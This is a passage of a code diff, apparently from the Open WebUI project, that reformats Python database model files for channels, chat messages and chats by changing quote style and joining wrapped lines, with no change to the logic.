get_channels_by_file_id_and_user_id( ) -> list[ChannelModel]: with get_db_context(db) as db: # 1. Determine which channels have this file - channel_file_rows = ( - db.query(ChannelFile).filter(ChannelFile.file_id == file_id).all() - ) + channel_file_rows = db.query(ChannelFile).filter(ChannelFile.file_id == file_id).all() channel_ids = [row.channel_id for row in channel_file_rows] if not channel_ids: @@ -787,15 +720,13 @@ def get_channels_by_file_id_and_user_id( return [] # Preload user's group membership - user_group_ids = [ - g.id for g in Groups.get_groups_by_member_id(user_id, db=db) - ] + user_group_ids = [g.id for g in Groups.get_groups_by_member_id(user_id, db=db)] allowed_channels = [] for channel in channels: # --- Case A: group or dm => user must be an active member --- - if channel.type in ["group", "dm"]: + if channel.type in ['group', 'dm']: membership = ( db.query(ChannelMember) .filter( @@ -815,8 +746,8 @@ def get_channels_by_file_id_and_user_id( query = self._has_permission( db, query, - {"user_id": user_id, "group_ids": user_group_ids}, - permission="read", + {'user_id': user_id, 'group_ids': user_group_ids}, + permission='read', ) allowed = query.first() @@ -844,7 +775,7 @@ def get_channel_by_id_and_user_id( return None # If the channel is a group or dm, read access requires membership (active) - if channel.type in ["group", "dm"]: + if channel.type in ['group', 'dm']: membership = ( db.query(ChannelMember) .filter( @@ -863,24 +794,18 @@ def get_channel_by_id_and_user_id( query = db.query(Channel).filter(Channel.id == id) # Determine user groups - user_group_ids = [ - group.id for group in Groups.get_groups_by_member_id(user_id, db=db) - ] + user_group_ids = [group.id for group in Groups.get_groups_by_member_id(user_id, db=db)] # Apply ACL rules query = self._has_permission( db, query, - {"user_id": user_id, "group_ids": user_group_ids}, - permission="read", + {'user_id': user_id, 'group_ids': user_group_ids}, + permission='read', ) channel_allowed = query.first() - return ( - self._to_channel_model(channel_allowed, db=db) - if channel_allowed - else None - ) + return self._to_channel_model(channel_allowed, db=db) if channel_allowed else None def update_channel_by_id( self, id: str, form_data: ChannelForm, db: Optional[Session] = None @@ -898,9 +823,7 @@ def update_channel_by_id( channel.meta = form_data.meta if form_data.access_grants is not None: - AccessGrants.set_access_grants( - "channel", id, form_data.access_grants, db=db - ) + AccessGrants.set_access_grants('channel', id, form_data.access_grants, db=db) channel.updated_at = int(time.time_ns()) db.commit() @@ -912,12 +835,12 @@ def add_file_to_channel_by_id( with get_db_context(db) as db: channel_file = ChannelFileModel( **{ - "id": str(uuid.uuid4()), - "channel_id": channel_id, - "file_id": file_id, - "user_id": user_id, - "created_at": int(time.time()), - "updated_at": int(time.time()), + 'id': str(uuid.uuid4()), + 'channel_id': channel_id, + 'file_id': file_id, + 'user_id': user_id, + 'created_at': int(time.time()), + 'updated_at': int(time.time()), } ) @@ -942,11 +865,7 @@ def set_file_message_id_in_channel_by_id( ) -> bool: try: with get_db_context(db) as db: - channel_file = ( - db.query(ChannelFile) - .filter_by(channel_id=channel_id, file_id=file_id) - .first() - ) + channel_file = db.query(ChannelFile).filter_by(channel_id=channel_id, file_id=file_id).first() if not channel_file: return False @@ -958,22 +877,18 @@ def set_file_message_id_in_channel_by_id( except Exception: return False - def remove_file_from_channel_by_id( - self, channel_id: str, file_id: str, db: Optional[Session] = None - ) -> bool: + def remove_file_from_channel_by_id(self, channel_id: str, file_id: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: - db.query(ChannelFile).filter_by( - channel_id=channel_id, file_id=file_id - ).delete() + db.query(ChannelFile).filter_by(channel_id=channel_id, file_id=file_id).delete() db.commit() return True except Exception: return False def delete_channel_by_id(self, id: str, db: Optional[Session] = None) -> bool: with get_db_context(db) as db: - AccessGrants.revoke_all_access("channel", id, db=db) + AccessGrants.revoke_all_access('channel', id, db=db) db.query(Channel).filter(Channel.id == id).delete() db.commit() return True @@ -1005,24 +920,14 @@ def insert_webhook( db.commit() return webhook - def get_webhooks_by_channel_id( - self, channel_id: str, db: Optional[Session] = None - ) -> list[ChannelWebhookModel]: + def get_webhooks_by_channel_id(self, channel_id: str, db: Optional[Session] = None) -> list[ChannelWebhookModel]: with get_db_context(db) as db: - webhooks = ( - db.query(ChannelWebhook) - .filter(ChannelWebhook.channel_id == channel_id) - .all() - ) + webhooks = db.query(ChannelWebhook).filter(ChannelWebhook.channel_id == channel_id).all() return [ChannelWebhookModel.model_validate(w) for w in webhooks] - def get_webhook_by_id( - self, webhook_id: str, db: Optional[Session] = None - ) -> Optional[ChannelWebhookModel]: + def get_webhook_by_id(self, webhook_id: str, db: Optional[Session] = None) -> Optional[ChannelWebhookModel]: with get_db_context(db) as db: - webhook = ( - db.query(ChannelWebhook).filter(ChannelWebhook.id == webhook_id).first() - ) + webhook = db.query(ChannelWebhook).filter(ChannelWebhook.id == webhook_id).first() return ChannelWebhookModel.model_validate(webhook) if webhook else None def get_webhook_by_id_and_token( @@ -1046,9 +951,7 @@ def update_webhook_by_id( db: Optional[Session] = None, ) -> Optional[ChannelWebhookModel]: with get_db_context(db) as db: - webhook = ( - db.query(ChannelWebhook).filter(ChannelWebhook.id == webhook_id).first() - ) + webhook = db.query(ChannelWebhook).filter(ChannelWebhook.id == webhook_id).first() if not webhook: return None webhook.name = form_data.name @@ -1057,28 +960,18 @@ def update_webhook_by_id( db.commit() return ChannelWebhookModel.model_validate(webhook) - def update_webhook_last_used_at( - self, webhook_id: str, db: Optional[Session] = None - ) -> bool: + def update_webhook_last_used_at(self, webhook_id: str, db: Optional[Session] = None) -> bool: with get_db_context(db) as db: - webhook = ( - db.query(ChannelWebhook).filter(ChannelWebhook.id == webhook_id).first() - ) + webhook = db.query(ChannelWebhook).filter(ChannelWebhook.id == webhook_id).first() if not webhook: return False webhook.last_used_at = int(time.time_ns()) db.commit() return True - def delete_webhook_by_id( - self, webhook_id: str, db: Optional[Session] = None - ) -> bool: + def delete_webhook_by_id(self, webhook_id: str, db: Optional[Session] = None) -> bool: with get_db_context(db) as db: - result = ( - db.query(ChannelWebhook) - .filter(ChannelWebhook.id == webhook_id) - .delete() - ) + result = db.query(ChannelWebhook).filter(ChannelWebhook.id == webhook_id).delete() db.commit() return result > 0
backend/open_webui/models/chat_messages.py+112 −175 modified@@ -47,13 +47,11 @@ def _normalize_timestamp(timestamp: int) -> float: class ChatMessage(Base): - __tablename__ = "chat_message" + __tablename__ = 'chat_message' # Identity id = Column(Text, primary_key=True) - chat_id = Column( - Text, ForeignKey("chat.id", ondelete="CASCADE"), nullable=False, index=True - ) + chat_id = Column(Text, ForeignKey('chat.id', ondelete='CASCADE'), nullable=False, index=True) user_id = Column(Text, index=True) # Structure @@ -85,9 +83,9 @@ class ChatMessage(Base): updated_at = Column(BigInteger) __table_args__ = ( - Index("chat_message_chat_parent_idx", "chat_id", "parent_id"), - Index("chat_message_model_created_idx", "model_id", "created_at"), - Index("chat_message_user_created_idx", "user_id", "created_at"), + Index('chat_message_chat_parent_idx', 'chat_id', 'parent_id'), + Index('chat_message_model_created_idx', 'model_id', 'created_at'), + Index('chat_message_user_created_idx', 'user_id', 'created_at'), ) @@ -135,43 +133,41 @@ def upsert_message( """Insert or update a chat message.""" with get_db_context(db) as db: now = int(time.time()) - timestamp = data.get("timestamp", now) + timestamp = data.get('timestamp', now) # Use composite ID: {chat_id}-{message_id} - composite_id = f"{chat_id}-{message_id}" + composite_id = f'{chat_id}-{message_id}' existing = db.get(ChatMessage, composite_id) if existing: # Update existing - if "role" in data: - existing.role = data["role"] - if "parent_id" in data: - existing.parent_id = data.get("parent_id") or data.get("parentId") - if "content" in data: - existing.content = data.get("content") - if "output" in data: - existing.output = data.get("output") - if "model_id" in data or "model" in data: - existing.model_id = data.get("model_id") or data.get("model") - if "files" in data: - existing.files = data.get("files") - if "sources" in data: - existing.sources = data.get("sources") - if "embeds" in data: - existing.embeds = data.get("embeds") - if "done" in data: - existing.done = data.get("done", True) - if "status_history" in data or "statusHistory" in data: - existing.status_history = data.get("status_history") or data.get( - "statusHistory" - ) - if "error" in data: - existing.error = data.get("error") + if 'role' in data: + existing.role = data['role'] + if 'parent_id' in data: + existing.parent_id = data.get('parent_id') or data.get('parentId') + if 'content' in data: + existing.content = data.get('content') + if 'output' in data: + existing.output = data.get('output') + if 'model_id' in data or 'model' in data: + existing.model_id = data.get('model_id') or data.get('model') + if 'files' in data: + existing.files = data.get('files') + if 'sources' in data: + existing.sources = data.get('sources') + if 'embeds' in data: + existing.embeds = data.get('embeds') + if 'done' in data: + existing.done = data.get('done', True) + if 'status_history' in data or 'statusHistory' in data: + existing.status_history = data.get('status_history') or data.get('statusHistory') + if 'error' in data: + existing.error = data.get('error') # Extract usage - check direct field first, then info.usage - usage = data.get("usage") + usage = data.get('usage') if not usage: - info = data.get("info", {}) - usage = info.get("usage") if info else None + info = data.get('info', {}) + usage = info.get('usage') if info else None if usage: existing.usage = usage existing.updated_at = now @@ -181,26 +177,25 @@ def upsert_message( else: # Insert new # Extract usage - check direct field first, then info.usage - usage = data.get("usage") + usage = data.get('usage') if not usage: - info = data.get("info", {}) - usage = info.get("usage") if info else None + info = data.get('info', {}) + usage = info.get('usage') if info else None message = ChatMessage( id=composite_id, chat_id=chat_id, user_id=user_id, - role=data.get("role", "user"), - parent_id=data.get("parent_id") or data.get("parentId"), - content=data.get("content"), - output=data.get("output"), - model_id=data.get("model_id") or data.get("model"), - files=data.get("files"), - sources=data.get("sources"), - embeds=data.get("embeds"), - done=data.get("done", True), - status_history=data.get("status_history") - or data.get("statusHistory"), - error=data.get("error"), + role=data.get('role', 'user'), + parent_id=data.get('parent_id') or data.get('parentId'), + content=data.get('content'), + output=data.get('output'), + model_id=data.get('model_id') or data.get('model'), + files=data.get('files'), + sources=data.get('sources'), + embeds=data.get('embeds'), + done=data.get('done', True), + status_history=data.get('status_history') or data.get('statusHistory'), + error=data.get('error'), usage=usage, created_at=timestamp, updated_at=now, @@ -210,23 +205,14 @@ def upsert_message( db.refresh(message) return ChatMessageModel.model_validate(message) - def get_message_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[ChatMessageModel]: + def get_message_by_id(self, id: str, db: Optional[Session] = None) -> Optional[ChatMessageModel]: with get_db_context(db) as db: message = db.get(ChatMessage, id) return ChatMessageModel.model_validate(message) if message else None - def get_messages_by_chat_id( - self, chat_id: str, db: Optional[Session] = None - ) -> list[ChatMessageModel]: + def get_messages_by_chat_id(self, chat_id: str, db: Optional[Session] = None) -> list[ChatMessageModel]: with get_db_context(db) as db: - messages = ( - db.query(ChatMessage) - .filter_by(chat_id=chat_id) - .order_by(ChatMessage.created_at.asc()) - .all() - ) + messages = db.query(ChatMessage).filter_by(chat_id=chat_id).order_by(ChatMessage.created_at.asc()).all() return [ChatMessageModel.model_validate(message) for message in messages] def get_messages_by_user_id( @@ -262,12 +248,7 @@ def get_messages_by_model_id( query = query.filter(ChatMessage.created_at >= start_date) if end_date: query = query.filter(ChatMessage.created_at <= end_date) - messages = ( - query.order_by(ChatMessage.created_at.desc()) - .offset(skip) - .limit(limit) - .all() - ) + messages = query.order_by(ChatMessage.created_at.desc()).offset(skip).limit(limit).all() return [ChatMessageModel.model_validate(message) for message in messages] def get_chat_ids_by_model_id( @@ -284,7 +265,7 @@ def get_chat_ids_by_model_id( with get_db_context(db) as db: query = db.query( ChatMessage.chat_id, - func.max(ChatMessage.created_at).label("last_message_at"), + func.max(ChatMessage.created_at).label('last_message_at'), ).filter(ChatMessage.model_id == model_id) if start_date: query = query.filter(ChatMessage.created_at >= start_date) @@ -303,9 +284,7 @@ def get_chat_ids_by_model_id( ) return [chat_id for chat_id, _ in chat_ids] - def delete_messages_by_chat_id( - self, chat_id: str, db: Optional[Session] = None - ) -> bool: + def delete_messages_by_chat_id(self, chat_id: str, db: Optional[Session] = None) -> bool: with get_db_context(db) as db: db.query(ChatMessage).filter_by(chat_id=chat_id).delete() db.commit() @@ -323,24 +302,18 @@ def get_message_count_by_model( from sqlalchemy import func from open_webui.models.groups import GroupMember - query = db.query( - ChatMessage.model_id, func.count(ChatMessage.id).label("count") - ).filter( - ChatMessage.role == "assistant", + query = db.query(ChatMessage.model_id, func.count(ChatMessage.id).label('count')).filter( + ChatMessage.role == 'assistant', ChatMessage.model_id.isnot(None), - ~ChatMessage.user_id.like("shared-%"), + ~ChatMessage.user_id.like('shared-%'), ) if start_date: query = query.filter(ChatMessage.created_at >= start_date) if end_date: query = query.filter(ChatMessage.created_at <= end_date) if group_id: - group_users = ( - db.query(GroupMember.user_id) - .filter(GroupMember.group_id == group_id) - .subquery() - ) + group_users = db.query(GroupMember.user_id).filter(GroupMember.group_id == group_id).subquery() query = query.filter(ChatMessage.user_id.in_(group_users)) results = query.group_by(ChatMessage.model_id).all() @@ -360,58 +333,50 @@ def get_token_usage_by_model( dialect = db.bind.dialect.name - if dialect == "sqlite": - input_tokens = cast( - func.json_extract(ChatMessage.usage, "$.input_tokens"), Integer - ) - output_tokens = cast( - func.json_extract(ChatMessage.usage, "$.output_tokens"), Integer - ) - elif dialect == "postgresql": + if dialect == 'sqlite': + input_tokens = cast(func.json_extract(ChatMessage.usage, '$.input_tokens'), Integer) + output_tokens = cast(func.json_extract(ChatMessage.usage, '$.output_tokens'), Integer) + elif dialect == 'postgresql': # Use json_extract_path_text for PostgreSQL JSON columns input_tokens = cast( - func.json_extract_path_text(ChatMessage.usage, "input_tokens"), + func.json_extract_path_text(ChatMessage.usage, 'input_tokens'), Integer, ) output_tokens = cast( - func.json_extract_path_text(ChatMessage.usage, "output_tokens"), + func.json_extract_path_text(ChatMessage.usage, 'output_tokens'), Integer, ) else: - raise NotImplementedError(f"Unsupported dialect: {dialect}") + raise NotImplementedError(f'Unsupported dialect: {dialect}') query = db.query( ChatMessage.model_id, - func.coalesce(func.sum(input_tokens), 0).label("input_tokens"), - func.coalesce(func.sum(output_tokens), 0).label("output_tokens"), - func.count(ChatMessage.id).label("message_count"), + func.coalesce(func.sum(input_tokens), 0).label('input_tokens'), + func.coalesce(func.sum(output_tokens), 0).label('output_tokens'), + func.count(ChatMessage.id).label('message_count'), ).filter( - ChatMessage.role == "assistant", + ChatMessage.role == 'assistant', ChatMessage.model_id.isnot(None), ChatMessage.usage.isnot(None), - ~ChatMessage.user_id.like("shared-%"), + ~ChatMessage.user_id.like('shared-%'), ) if start_date: query = query.filter(ChatMessage.created_at >= start_date) if end_date: query = query.filter(ChatMessage.created_at <= end_date) if group_id: - group_users = ( - db.query(GroupMember.user_id) - .filter(GroupMember.group_id == group_id) - .subquery() - ) + group_users = db.query(GroupMember.user_id).filter(GroupMember.group_id == group_id).subquery() query = query.filter(ChatMessage.user_id.in_(group_users)) results = query.group_by(ChatMessage.model_id).all() return { row.model_id: { - "input_tokens": row.input_tokens, - "output_tokens": row.output_tokens, - "total_tokens": row.input_tokens + row.output_tokens, - "message_count": row.message_count, + 'input_tokens': row.input_tokens, + 'output_tokens': row.output_tokens, + 'total_tokens': row.input_tokens + row.output_tokens, + 'message_count': row.message_count, } for row in results } @@ -430,58 +395,50 @@ def get_token_usage_by_user( dialect = db.bind.dialect.name - if dialect == "sqlite": - input_tokens = cast( - func.json_extract(ChatMessage.usage, "$.input_tokens"), Integer - ) - output_tokens = cast( - func.json_extract(ChatMessage.usage, "$.output_tokens"), Integer - ) - elif dialect == "postgresql": + if dialect == 'sqlite': + input_tokens = cast(func.json_extract(ChatMessage.usage, '$.input_tokens'), Integer) + output_tokens = cast(func.json_extract(ChatMessage.usage, '$.output_tokens'), Integer) + elif dialect == 'postgresql': # Use json_extract_path_text for PostgreSQL JSON columns input_tokens = cast( - func.json_extract_path_text(ChatMessage.usage, "input_tokens"), + func.json_extract_path_text(ChatMessage.usage, 'input_tokens'), Integer, ) output_tokens = cast( - func.json_extract_path_text(ChatMessage.usage, "output_tokens"), + func.json_extract_path_text(ChatMessage.usage, 'output_tokens'), Integer, ) else: - raise NotImplementedError(f"Unsupported dialect: {dialect}") + raise NotImplementedError(f'Unsupported dialect: {dialect}') query = db.query( ChatMessage.user_id, - func.coalesce(func.sum(input_tokens), 0).label("input_tokens"), - func.coalesce(func.sum(output_tokens), 0).label("output_tokens"), - func.count(ChatMessage.id).label("message_count"), + func.coalesce(func.sum(input_tokens), 0).label('input_tokens'), + func.coalesce(func.sum(output_tokens), 0).label('output_tokens'), + func.count(ChatMessage.id).label('message_count'), ).filter( - ChatMessage.role == "assistant", + ChatMessage.role == 'assistant', ChatMessage.user_id.isnot(None), ChatMessage.usage.isnot(None), - ~ChatMessage.user_id.like("shared-%"), + ~ChatMessage.user_id.like('shared-%'), ) if start_date: query = query.filter(ChatMessage.created_at >= start_date) if end_date: query = query.filter(ChatMessage.created_at <= end_date) if group_id: - group_users = ( - db.query(GroupMember.user_id) - .filter(GroupMember.group_id == group_id) - .subquery() - ) + group_users = db.query(GroupMember.user_id).filter(GroupMember.group_id == group_id).subquery() query = query.filter(ChatMessage.user_id.in_(group_users)) results = query.group_by(ChatMessage.user_id).all() return { row.user_id: { - "input_tokens": row.input_tokens, - "output_tokens": row.output_tokens, - "total_tokens": row.input_tokens + row.output_tokens, - "message_count": row.message_count, + 'input_tokens': row.input_tokens, + 'output_tokens': row.output_tokens, + 'total_tokens': row.input_tokens + row.output_tokens, + 'message_count': row.message_count, } for row in results } @@ -497,20 +454,16 @@ def get_message_count_by_user( from sqlalchemy import func from open_webui.models.groups import GroupMember - query = db.query( - ChatMessage.user_id, func.count(ChatMessage.id).label("count") - ).filter(~ChatMessage.user_id.like("shared-%")) + query = db.query(ChatMessage.user_id, func.count(ChatMessage.id).label('count')).filter( + ~ChatMessage.user_id.like('shared-%') + ) if start_date: query = query.filter(ChatMessage.created_at >= start_date) if end_date: query = query.filter(ChatMessage.created_at <= end_date) if group_id: - group_users = ( - db.query(GroupMember.user_id) - .filter(GroupMember.group_id == group_id) - .subquery() - ) + group_users = db.query(GroupMember.user_id).filter(GroupMember.group_id == group_id).subquery() query = query.filter(ChatMessage.user_id.in_(group_users)) results = query.group_by(ChatMessage.user_id).all() @@ -527,20 +480,16 @@ def get_message_count_by_chat( from sqlalchemy import func from open_webui.models.groups import GroupMember - query = db.query( - ChatMessage.chat_id, func.count(ChatMessage.id).label("count") - ).filter(~ChatMessage.user_id.like("shared-%")) + query = db.query(ChatMessage.chat_id, func.count(ChatMessage.id).label('count')).filter( + ~ChatMessage.user_id.like('shared-%') + ) if start_date: query = query.filter(ChatMessage.created_at >= start_date) if end_date: query = query.filter(ChatMessage.created_at <= end_date) if group_id: - group_users = ( - db.query(GroupMember.user_id) - .filter(GroupMember.group_id == group_id) - .subquery() - ) + group_users = db.query(GroupMember.user_id).filter(GroupMember.group_id == group_id).subquery() query = query.filter(ChatMessage.user_id.in_(group_users)) results = query.group_by(ChatMessage.chat_id).all() @@ -559,43 +508,35 @@ def get_daily_message_counts_by_model( from open_webui.models.groups import GroupMember query = db.query(ChatMessage.created_at, ChatMessage.model_id).filter( - ChatMessage.role == "assistant", + ChatMessage.role == 'assistant', ChatMessage.model_id.isnot(None), - ~ChatMessage.user_id.like("shared-%"), + ~ChatMessage.user_id.like('shared-%'), ) if start_date: query = query.filter(ChatMessage.created_at >= start_date) if end_date: query = query.filter(ChatMessage.created_at <= end_date) if group_id: - group_users = ( - db.query(GroupMember.user_id) - .filter(GroupMember.group_id == group_id) - .subquery() - ) + group_users = db.query(GroupMember.user_id).filter(GroupMember.group_id == group_id).subquery() query = query.filter(ChatMessage.user_id.in_(group_users)) results = query.all() # Group by date -> model -> count daily_counts: dict[str, dict[str, int]] = {} for timestamp, model_id in results: - date_str = datetime.fromtimestamp( - _normalize_timestamp(timestamp) - ).strftime("%Y-%m-%d") + date_str = datetime.fromtimestamp(_normalize_timestamp(timestamp)).strftime('%Y-%m-%d') if date_str not in daily_counts: daily_counts[date_str] = {} - daily_counts[date_str][model_id] = ( - daily_counts[date_str].get(model_id, 0) + 1 - ) + daily_counts[date_str][model_id] = daily_counts[date_str].get(model_id, 0) + 1 # Fill in missing days if start_date and end_date: current = datetime.fromtimestamp(_normalize_timestamp(start_date)) end_dt = datetime.fromtimestamp(_normalize_timestamp(end_date)) while current <= end_dt: - date_str = current.strftime("%Y-%m-%d") + date_str = current.strftime('%Y-%m-%d') if date_str not in daily_counts: daily_counts[date_str] = {} current += timedelta(days=1) @@ -613,9 +554,9 @@ def get_hourly_message_counts_by_model( from datetime import datetime, timedelta query = db.query(ChatMessage.created_at, ChatMessage.model_id).filter( - ChatMessage.role == "assistant", + ChatMessage.role == 'assistant', ChatMessage.model_id.isnot(None), - ~ChatMessage.user_id.like("shared-%"), + ~ChatMessage.user_id.like('shared-%'), ) if start_date: @@ -628,23 +569,19 @@ def get_hourly_message_counts_by_model( # Group by hour -> model -> count hourly_counts: dict[str, dict[str, int]] = {} for timestamp, model_id in results: - hour_str = datetime.fromtimestamp( - _normalize_timestamp(timestamp) - ).strftime("%Y-%m-%d %H:00") + hour_str = datetime.fromtimestamp(_normalize_timestamp(timestamp)).strftime('%Y-%m-%d %H:00') if hour_str not in hourly_counts: hourly_counts[hour_str] = {} - hourly_counts[hour_str][model_id] = ( - hourly_counts[hour_str].get(model_id, 0) + 1 - ) + hourly_counts[hour_str][model_id] = hourly_counts[hour_str].get(model_id, 0) + 1 # Fill in missing hours if start_date and end_date: - current = datetime.fromtimestamp( - _normalize_timestamp(start_date) - ).replace(minute=0, second=0, microsecond=0) + current = datetime.fromtimestamp(_normalize_timestamp(start_date)).replace( + minute=0, second=0, microsecond=0 + ) end_dt = datetime.fromtimestamp(_normalize_timestamp(end_date)) while current <= end_dt: - hour_str = current.strftime("%Y-%m-%d %H:00") + hour_str = current.strftime('%Y-%m-%d %H:00') if hour_str not in hourly_counts: hourly_counts[hour_str] = {} current += timedelta(hours=1)
backend/open_webui/models/chats.py+253 −420 modified@@ -35,7 +35,7 @@ class Chat(Base): - __tablename__ = "chat" + __tablename__ = 'chat' id = Column(String, primary_key=True, unique=True) user_id = Column(String) @@ -49,21 +49,21 @@ class Chat(Base): archived = Column(Boolean, default=False) pinned = Column(Boolean, default=False, nullable=True) - meta = Column(JSON, server_default="{}") + meta = Column(JSON, server_default='{}') folder_id = Column(Text, nullable=True) __table_args__ = ( # Performance indexes for common queries # WHERE folder_id = ... - Index("folder_id_idx", "folder_id"), + Index('folder_id_idx', 'folder_id'), # WHERE user_id = ... AND pinned = ... - Index("user_id_pinned_idx", "user_id", "pinned"), + Index('user_id_pinned_idx', 'user_id', 'pinned'), # WHERE user_id = ... AND archived = ... - Index("user_id_archived_idx", "user_id", "archived"), + Index('user_id_archived_idx', 'user_id', 'archived'), # WHERE user_id = ... ORDER BY updated_at DESC - Index("updated_at_user_id_idx", "updated_at", "user_id"), + Index('updated_at_user_id_idx', 'updated_at', 'user_id'), # WHERE folder_id = ... AND user_id = ... - Index("folder_id_user_id_idx", "folder_id", "user_id"), + Index('folder_id_user_id_idx', 'folder_id', 'user_id'), ) @@ -87,21 +87,19 @@ class ChatModel(BaseModel): class ChatFile(Base): - __tablename__ = "chat_file" + __tablename__ = 'chat_file' id = Column(Text, unique=True, primary_key=True) user_id = Column(Text, nullable=False) - chat_id = Column(Text, ForeignKey("chat.id", ondelete="CASCADE"), nullable=False) + chat_id = Column(Text, ForeignKey('chat.id', ondelete='CASCADE'), nullable=False) message_id = Column(Text, nullable=True) - file_id = Column(Text, ForeignKey("file.id", ondelete="CASCADE"), nullable=False) + file_id = Column(Text, ForeignKey('file.id', ondelete='CASCADE'), nullable=False) created_at = Column(BigInteger, nullable=False) updated_at = Column(BigInteger, nullable=False) - __table_args__ = ( - UniqueConstraint("chat_id", "file_id", name="uq_chat_file_chat_file"), - ) + __table_args__ = (UniqueConstraint('chat_id', 'file_id', name='uq_chat_file_chat_file'),) class ChatFileModel(BaseModel): @@ -191,33 +189,25 @@ class ChatUsageStatsResponse(BaseModel): history_models: dict = {} # models used in the chat history with their usage counts history_message_count: int # number of messages in the chat history history_user_message_count: int # number of user messages in the chat history - history_assistant_message_count: ( - int # number of assistant messages in the chat history - ) + history_assistant_message_count: int # number of assistant messages in the chat history - average_response_time: ( - float # average response time of assistant messages in seconds - ) - average_user_message_content_length: ( - float # average length of user message contents - ) - average_assistant_message_content_length: ( - float # average length of assistant message contents - ) + average_response_time: float # average response time of assistant messages in seconds + average_user_message_content_length: float # average length of user message contents + average_assistant_message_content_length: float # average length of assistant message contents tags: list[str] = [] # tags associated with the chat last_message_at: int # timestamp of the last message updated_at: int created_at: int - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') class ChatUsageStatsListResponse(BaseModel): items: list[ChatUsageStatsResponse] total: int - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') class MessageStats(BaseModel): @@ -290,24 +280,20 @@ def _sanitize_chat_row(self, chat_item): return changed - def insert_new_chat( - self, user_id: str, form_data: ChatForm, db: Optional[Session] = None - ) -> Optional[ChatModel]: + def insert_new_chat(self, user_id: str, form_data: ChatForm, db: Optional[Session] = None) -> Optional[ChatModel]: with get_db_context(db) as db: id = str(uuid.uuid4()) chat = ChatModel( **{ - "id": id, - "user_id": user_id, - "title": self._clean_null_bytes( - form_data.chat["title"] - if "title" in form_data.chat - else "New Chat" + 'id': id, + 'user_id': user_id, + 'title': self._clean_null_bytes( + form_data.chat['title'] if 'title' in form_data.chat else 'New Chat' ), - "chat": self._clean_null_bytes(form_data.chat), - "folder_id": form_data.folder_id, - "created_at": int(time.time()), - "updated_at": int(time.time()), + 'chat': self._clean_null_bytes(form_data.chat), + 'folder_id': form_data.folder_id, + 'created_at': int(time.time()), + 'updated_at': int(time.time()), } ) @@ -318,44 +304,34 @@ def insert_new_chat( # Dual-write initial messages to chat_message table try: - history = form_data.chat.get("history", {}) - messages = history.get("messages", {}) + history = form_data.chat.get('history', {}) + messages = history.get('messages', {}) for message_id, message in messages.items(): - if isinstance(message, dict) and message.get("role"): + if isinstance(message, dict) and message.get('role'): ChatMessages.upsert_message( message_id=message_id, chat_id=id, user_id=user_id, data=message, ) except Exception as e: - log.warning( - f"Failed to write initial messages to chat_message table: {e}" - ) + log.warning(f'Failed to write initial messages to chat_message table: {e}') return ChatModel.model_validate(chat_item) if chat_item else None - def _chat_import_form_to_chat_model( - self, user_id: str, form_data: ChatImportForm - ) -> ChatModel: + def _chat_import_form_to_chat_model(self, user_id: str, form_data: ChatImportForm) -> ChatModel: id = str(uuid.uuid4()) chat = ChatModel( **{ - "id": id, - "user_id": user_id, - "title": self._clean_null_bytes( - form_data.chat["title"] if "title" in form_data.chat else "New Chat" - ), - "chat": self._clean_null_bytes(form_data.chat), - "meta": form_data.meta, - "pinned": form_data.pinned, - "folder_id": form_data.folder_id, - "created_at": ( - form_data.created_at if form_data.created_at else int(time.time()) - ), - "updated_at": ( - form_data.updated_at if form_data.updated_at else int(time.time()) - ), + 'id': id, + 'user_id': user_id, + 'title': self._clean_null_bytes(form_data.chat['title'] if 'title' in form_data.chat else 'New Chat'), + 'chat': self._clean_null_bytes(form_data.chat), + 'meta': form_data.meta, + 'pinned': form_data.pinned, + 'folder_id': form_data.folder_id, + 'created_at': (form_data.created_at if form_data.created_at else int(time.time())), + 'updated_at': (form_data.updated_at if form_data.updated_at else int(time.time())), } ) return chat @@ -379,35 +355,27 @@ def import_chats( # Dual-write messages to chat_message table try: for form_data, chat_obj in zip(chat_import_forms, chats): - history = form_data.chat.get("history", {}) - messages = history.get("messages", {}) + history = form_data.chat.get('history', {}) + messages = history.get('messages', {}) for message_id, message in messages.items(): - if isinstance(message, dict) and message.get("role"): + if isinstance(message, dict) and message.get('role'): ChatMessages.upsert_message( message_id=message_id, chat_id=chat_obj.id, user_id=user_id, data=message, ) except Exception as e: - log.warning( - f"Failed to write imported messages to chat_message table: {e}" - ) + log.warning(f'Failed to write imported messages to chat_message table: {e}') return [ChatModel.model_validate(chat) for chat in chats] - def update_chat_by_id( - self, id: str, chat: dict, db: Optional[Session] = None - ) -> Optional[ChatModel]: + def update_chat_by_id(self, id: str, chat: dict, db: Optional[Session] = None) -> Optional[ChatModel]: try: with get_db_context(db) as db: chat_item = db.get(Chat, id) chat_item.chat = self._clean_null_bytes(chat) - chat_item.title = ( - self._clean_null_bytes(chat["title"]) - if "title" in chat - else "New Chat" - ) + chat_item.title = self._clean_null_bytes(chat['title']) if 'title' in chat else 'New Chat' chat_item.updated_at = int(time.time()) @@ -424,24 +392,22 @@ def update_chat_title_by_id(self, id: str, title: str) -> Optional[ChatModel]: return None chat = chat.chat - chat["title"] = title + chat['title'] = title return self.update_chat_by_id(id, chat) - def update_chat_tags_by_id( - self, id: str, tags: list[str], user - ) -> Optional[ChatModel]: + def update_chat_tags_by_id(self, id: str, tags: list[str], user) -> Optional[ChatModel]: with get_db_context() as db: chat = db.get(Chat, id) if chat is None: return None - old_tags = chat.meta.get("tags", []) - new_tags = [t for t in tags if t.replace(" ", "_").lower() != "none"] - new_tag_ids = [t.replace(" ", "_").lower() for t in new_tags] + old_tags = chat.meta.get('tags', []) + new_tags = [t for t in tags if t.replace(' ', '_').lower() != 'none'] + new_tag_ids = [t.replace(' ', '_').lower() for t in new_tags] # Single meta update - chat.meta = {**chat.meta, "tags": new_tag_ids} + chat.meta = {**chat.meta, 'tags': new_tag_ids} db.commit() db.refresh(chat) @@ -460,23 +426,21 @@ def get_chat_title_by_id(self, id: str) -> Optional[str]: result = db.query(Chat.title).filter_by(id=id).first() if result is None: return None - return result[0] or "New Chat" + return result[0] or 'New Chat' def get_messages_map_by_chat_id(self, id: str) -> Optional[dict]: chat = self.get_chat_by_id(id) if chat is None: return None - return chat.chat.get("history", {}).get("messages", {}) or {} + return chat.chat.get('history', {}).get('messages', {}) or {} - def get_message_by_id_and_message_id( - self, id: str, message_id: str - ) -> Optional[dict]: + def get_message_by_id_and_message_id(self, id: str, message_id: str) -> Optional[dict]: chat = self.get_chat_by_id(id) if 